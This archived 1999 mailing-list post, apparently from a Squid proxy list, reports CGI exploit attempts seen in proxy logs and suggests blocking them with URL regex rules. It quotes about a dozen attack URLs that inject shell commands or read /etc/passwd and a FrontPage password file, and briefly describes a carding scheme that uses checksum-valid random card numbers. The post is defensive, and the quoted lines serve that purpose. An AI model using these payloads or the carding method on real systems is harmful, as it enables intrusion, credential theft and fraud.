proxy scams and abuse

From: Andrew Daviel <andrew@dont-contact.us>
Date: Fri, 22 Jan 1999 00:36:39 -0800 (PST)

Recently, I seem to be getting more and more CGI exploit attempts. One
such came through a Squid at an educational institution. They reported
345 attempts to get /cgi-bin/aglimpse/80* .....

There seems to be a list somewhere of CGI exploits such as:

/cgi-bin/phf?Qname=me%0als%20-lFa
/cgi-bin/faxsurvey?ls%20-lFa
/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/view-source?../../../../../../../../etc/passwd
/cgi-bin/htmlscript?../../../../../../../../etc/passwd
/cgi-bin/campas?%0als%20-lFa%20/etc
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/'
/_vti_pvt/service.pwd HTTP/1.0"

I suggested to my correspondant that they might consider the URL regex
features in Squid 2 to block such attempts.

On a semi-related subject, I hear of schemes to generate sequences of
random credit-card numbers, filter them through a checksum generator, then
use them to attempt to buy time on sex sites. Such sites may not validate
expiry dates or check names, require any corroborating ID etc. and may
mail passwords to temporary or anonymous email addresses. Attempts may use
public proxies to obfuscate the trail...

cheers

Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
Received on Fri Feb 05 1999 - 13:54:44 MST

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:44:27 MST